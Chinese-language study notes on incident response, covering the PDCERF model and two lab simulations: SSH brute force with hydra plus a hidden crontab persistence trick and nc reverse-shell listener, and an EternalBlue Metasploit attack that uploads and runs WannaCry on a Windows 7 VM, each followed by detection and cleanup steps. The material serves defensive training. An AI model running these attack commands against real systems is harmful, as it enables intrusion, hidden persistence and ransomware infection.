护网-应急响应
应急响应事件分类
应用安全
webshell、网页篡改、网页挂马
系统安全
勒索病毒、挖矿木马、远控后门
网络安全
DDOS攻击、ARP攻击、流量劫持
数据安全
数据泄露、损坏、加密
如何做应急响应
确定攻击时间
能够帮助我们缩小应急响应范围,有助于提高效率
查找攻击线索
能够让我们知道攻击者做了什么事情
梳理攻击流程
还原整个攻击场景
实施解决方案
修复漏洞,切断攻击途径
定位攻击者
溯源取证
应急响应模型(PDCERF)
准备阶段(Preparation)
- 应用团队建设
- 应急方案制定
- 渗透测试评估
- 安全基线检查
检测阶段(Detection)
- 判断事件类型
- 判断事件级别
- 确定应急方案
抑制阶段(Containment)
限制攻击/破环波及的范围,同时也是在降低潜在的损失
- 阻断:IP地址、网络连接、危险主机
- 关闭:可疑进程、可疑服务
- 删除:违规账号、危险文件
根除阶段(Eradication)
通过事件分析找出根源并彻底根除,以避免再次利用
- 增强:安全策略、全网监控
- 恢复:应用漏洞、系统漏洞、补丁更新
- 还原:操作系统、业务系统
恢复阶段(Recovery)
把被破坏的信息彻底还原到正常运行的状态
- 恢复业务系统
- 恢复用户数据
- 恢复网络通信
总结阶段(Follow-up)
回顾并整合应急响应过程的相关信息,进行事后分析总结和修订安全计划、政策、程序,并进行训练,以防止入侵的再次发生
- 事件会议总结
- 响应报告输出
- 响应工作优化
入侵排查
系统信息自检
Linux: lscpu,查看cpu信息
lsmod,查看载入的模块
排查恶意账户
linux
启动项
windows
linux
计划任务
windows
linux
SSH
SSH是什么
一种安全外壳协议
用途:远程登录系统
MobaXterm

常见端口对应服务

模拟SSH爆破攻击
攻击机:kali2022(192.168.48.138)
靶机:kali2021(192.168.48.135)
信息收集
使用nmap扫描目标主机的端口:
bash1
nmap 192.168.48.135
发现开启了22端口,尝试爆破
爆破SSH
使用hydra进行爆破
1 | hydra -L users.txt -P password.txt ssh://192.168.48.135 |
users.txt–用户字典
password.txt–密码字典
SSH登录
1 | ssh root@192.168.48.135 |

尝试创建隐藏计划任务
反弹shell
-e 执行指令
进入 /tmp 目录创建task.sh文件
1 | #!/bin/bash |
给予执行权限
1 | chmod +x tash.sh |
创建create_task.sh
查看计划任务
每隔一分钟执行一次task.sh
1 | (crontab -l ;printf "* * * * * /tmp/task.sh;\rno crontw-wab for `whoami`%100c\n")|crontab- |
给予执行权限
1 | chmod +x create_tash.sh |
尝试nc连接目标主机的shell
1 | nc -lvp 7777 |
为什么要创建计划任务
权限维持,如果密码修改之后,还可以通过计划任务获得shell
(创建计划任务都是攻击机上的操作)
总结
SSH应急响应
事件排查
1 | netstart -antpl |
发现有外部连接
查看进程树
1 | pstree -p |
查看具体进程
1 | systemctl status 193250 |
查看计划任务
1 | cat -A /var/spool/cron/crontabs/root |
1 | 查看文件上传时间 |
查看内容
1 | cat /tmp/task.sh |
查看日志(登录成功)
1 | last -f /var/log/wtmp |
登录失败的日志
1 | last -f /var/log/btmp |
删除隐藏的计划任务
1 | crontab -r -u root |
再次查看没有了
杀掉进程
1 | kill 193250 |
删除掉文件
1 | cd /tmp |
1 | ls |
1 | rm task.sh |
1 | rm create_task.sh |
修改账号密码
修改ssh默认端口
勒索病毒简介
勒索病毒模拟攻击
攻击机:kali(192.1668.48.138)
靶机:win7(192.168.48.137)
启动msf
1 | msfconsole |
搜索相关模块
永恒之蓝
1 | search ms17-010 |
使用永恒之蓝进行攻击
1 | use 0 |
配置参数
1 | set rhosts 192.168.48.137 |
开始攻击
1 | run |
爆破成功,返回一个会话
上传病毒
文件夹下有一个勒索病毒压缩包
解压
1 | unzip 文件名 |
红色的需要继续解压
1 | ls -i |
找到压缩包,并解压
1 | find -inum 2228367 -exec unzip {} \; |
有下划线不是一个可执行文件,需要重命名
1 | mv wcry.exe_ wcry.exe |
上传
在会话中上传病毒
确定勒索病毒已执行
1 | ps -ef | grep wcry.exe |
勒索病毒应急响应
1、事件判断
2、临时处置
禁止使用U盘、移动硬盘
3、信息搜集与分析
样本分析
文件排查

1 | https://x.threatbook.com/ |
4、事件处置


5、事件防御
v1.5.1